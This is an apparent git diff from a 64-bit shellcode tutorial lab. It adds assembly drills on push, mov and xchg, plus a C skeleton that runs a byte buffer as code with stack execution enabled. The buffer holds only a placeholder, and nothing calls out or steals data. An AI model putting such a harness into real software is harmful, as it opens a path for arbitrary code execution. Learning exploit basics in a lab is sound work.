+; push example and 8byte fun on 64bit architecture
+;
+
+BITS 64
+
+global _start
+_start:
+
+push byte 0x41
+push word 0x4142
+push dword 0x41424344
+; let's comment that out
+; comment it in to see the compile error
+;push 0x4142434445464748
diff --git a/x86_64/Example_Code/push_mov.asm b/x86_64/Example_Code/push_mov.asm
new file mode 100644
index 0000000..44e4e1a
--- /dev/null
+++ b/x86_64/Example_Code/push_mov.asm
@@ -0,0 +1,14 @@
+; shellcode-lab64
+; dash@hack4.org
+; push example and 8byte fun on 64bit architecture
+; use mov to bring up your 8byte value on the stack
+;
+
+BITS 64
+
+global _start
+_start:
+
+xor rax, rax ; clear register
+mov rax, 0x4142434445464748 ; place 8byte in register rax
+push rax ; push it onto the stack
diff --git a/x86_64/Example_Code/skeleton.c b/x86_64/Example_Code/skeleton.c
new file mode 100644
index 0000000..780761b
--- /dev/null
+++ b/x86_64/Example_Code/skeleton.c
@@ -0,0 +1,17 @@
+/* shellcode-lab 64Bit
+ dash@hack4.org
+
+ use -z execstack
+ or set char code to const
+*/
+
+#include
+#include
+
+unsigned char code[] ="shellcode wants to be placed here!";
+main()
+{
+ printf("Shellcode Len: %d\n", (int)strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
diff --git a/x86_64/Example_Code/xchg.asm b/x86_64/Example_Code/xchg.asm
new file mode 100644
index 0000000..990a523
--- /dev/null
+++ b/x86_64/Example_Code/xchg.asm
@@ -0,0 +1,20 @@
+; xchg example code
+; dash@hack4.org
+; shellcode lab
+; may 2016
+
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+xor rbx, rbx
+
+mov rax, 0x29A ; http://web.textfiles.com/ezines/29A/
+mov rbx, 0x539
+mov r10, 0xBEEFBEEFBEEFBEEF
+xchg rax, r10
+xchg r10, r9
+xchg rbx, rax
+xchg rdi,rsp
diff --git a/x86_64/Shellcode-Lab64_0x01.pdf b/x86_64/Shellcode-Lab64_0x01.pdf
new file mode 100644
index 0000000..497f348
Binary files /dev/null and b/x86_64/Shellcode-Lab64_0x01.pdf differ